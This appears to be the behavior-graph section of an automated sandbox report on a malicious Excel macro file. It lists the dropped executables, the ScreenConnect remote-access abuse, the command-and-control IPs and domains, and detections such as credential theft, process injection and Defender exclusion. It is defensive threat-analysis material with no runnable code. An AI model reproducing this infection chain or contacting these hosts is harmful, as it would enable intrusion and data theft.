                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637073 Sample: Document25.xlsm Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 140 www-msn-com.a-0003.a-msedge.net 2->140 142 star-azurefd-prod.trafficmanager.net 2->142 144 32 other IPs or domains 2->144 168 Suricata IDS alerts for network traffic 2->168 170 Found malware configuration 2->170 172 Malicious sample detected (through community Yara rule) 2->172 174 23 other signatures 2->174 12 EXCEL.EXE 269 63 2->12         started        17 msiexec.exe 2->17         started        19 ScreenConnect.ClientService.exe 2->19         started        21 14 other processes 2->21 signatures3 process4 dnsIp5 156 f005.backblazeb2.com 149.137.136.16, 443, 49693 ZOOM-VIDEO-COMM-ASUS United States 12->156 158 s-part-0032.t-0009.t-msedge.net 13.107.246.60, 443, 49705, 49707 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 12->158 122 C:\Users\user\AppData\Local\...\newpoveno.zip, Zip 12->122 dropped 124 C:\Users\user\AppData\...\invoice_log.txt, ASCII 12->124 dropped 202 Office process queries suspicious COM object (likely to drop second stage) 12->202 23 newpoveno.exe 1 8 12->23         started        27 7z.exe 6 12->27         started        29 regsvr32.exe 12->29         started        126 ScreenConnect.Wind...dentialProvider.dll, PE32+ 17->126 dropped 128 C:\...\ScreenConnect.ClientService.exe, PE32 17->128 dropped 130 C:\Windows\Installer\MSICABB.tmp, PE32 17->130 dropped 132 9 other files (none is malicious) 17->132 dropped 204 Enables network access during safeboot for specific services 17->204 206 Modifies security policies related information 17->206 31 msiexec.exe 17->31         started        39 2 other processes 17->39 160 server-ovh1025800-relay.screenconnect.com 15.204.12.5 HP-INTERNET-ASUS United States 19->160 208 Contains functionality to hide user accounts 19->208 210 Reads the Security eventlog 19->210 212 Reads the System eventlog 19->212 33 ScreenConnect.WindowsClient.exe 19->33         started        162 127.0.0.1 unknown unknown 21->162 214 Changes security center settings (notifications, updates, antivirus, firewall) 21->214 35 newpoveno.exe 21->35         started        37 newpoveno.exe 21->37         started        41 3 other processes 21->41 file6 signatures7 process8 file9 94 C:\Users\user\SystemRootDoc\newpoveno.exe, PE32+ 23->94 dropped 96 C:\Users\user\...\nasrallah_x86.dll, data 23->96 dropped 98 C:\Users\user\SystemRootDoc\msvcp290.dll, PE32+ 23->98 dropped 100 C:\Users\user\SystemRootDoc\libcares-2.dll, PE32+ 23->100 dropped 178 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 23->178 180 Writes to foreign memory regions 23->180 182 Allocates memory in foreign processes 23->182 184 Adds a directory exclusion to Windows Defender 23->184 43 AddInProcess32.exe 23->43         started        48 powershell.exe 23 23->48         started        50 conhost.exe 23->50         started        102 C:\Users\user\AppData\Local\...\newpoveno.exe, PE32+ 27->102 dropped 104 C:\Users\user\AppData\...\vcruntime210.dll, data 27->104 dropped 106 C:\Users\user\AppData\...\nasrallah_x86.dll, data 27->106 dropped 108 2 other files (none is malicious) 27->108 dropped 52 conhost.exe 27->52         started        54 rundll32.exe 31->54         started        186 Contains functionality to hide user accounts 33->186 188 Injects a PE file into a foreign processes 35->188 56 conhost.exe 35->56         started        58 AddInProcess32.exe 35->58         started        62 2 other processes 37->62 60 conhost.exe 41->60         started        signatures10 process11 dnsIp12 154 176.65.142.74, 4448, 4449, 49700 WEBTRAFFICDE Germany 43->154 112 C:\Users\user\AppData\Local\...\Document.exe, PE32 43->112 dropped 190 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 43->190 192 Tries to harvest and steal browser information (history, passwords, etc) 43->192 194 Writes to foreign memory regions 43->194 196 Injects a PE file into a foreign processes 43->196 64 cmd.exe 43->64         started        67 cvtres.exe 43->67         started        70 explorer.exe 43->70         started        198 Loading BitLocker PowerShell Module 48->198 72 conhost.exe 48->72         started        74 WmiPrvSE.exe 48->74         started        114 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 54->114 dropped 116 C:\...\ScreenConnect.InstallerActions.dll, PE32 54->116 dropped 118 C:\Users\user\...\ScreenConnect.Core.dll, PE32 54->118 dropped 120 4 other files (none is malicious) 54->120 dropped 200 Contains functionality to hide user accounts 54->200 file13 signatures14 process15 dnsIp16 164 Suspicious powershell command line found 64->164 166 Bypasses PowerShell execution policy 64->166 76 powershell.exe 64->76         started        78 conhost.exe 64->78         started        146 ipinfo.io 34.117.59.81 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 67->146 80 chrome.exe 67->80         started        83 conhost.exe 67->83         started        signatures17 process18 dnsIp19 85 Document.exe 76->85         started        134 192.168.2.9, 443, 4448, 4449 unknown unknown 80->134 136 192.168.2.23 unknown unknown 80->136 138 192.168.2.4 unknown unknown 80->138 88 chrome.exe 80->88         started        process20 dnsIp21 176 Contains functionality to hide user accounts 85->176 91 msiexec.exe 85->91         started        148 www.google.com 142.250.185.132 GOOGLEUS United States 88->148 150 play.google.com 142.250.185.142 GOOGLEUS United States 88->150 152 7 other IPs or domains 88->152 signatures22 process23 file24 110 C:\Users\user\AppData\Local\...\MSIBE65.tmp, PE32 91->110 dropped

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.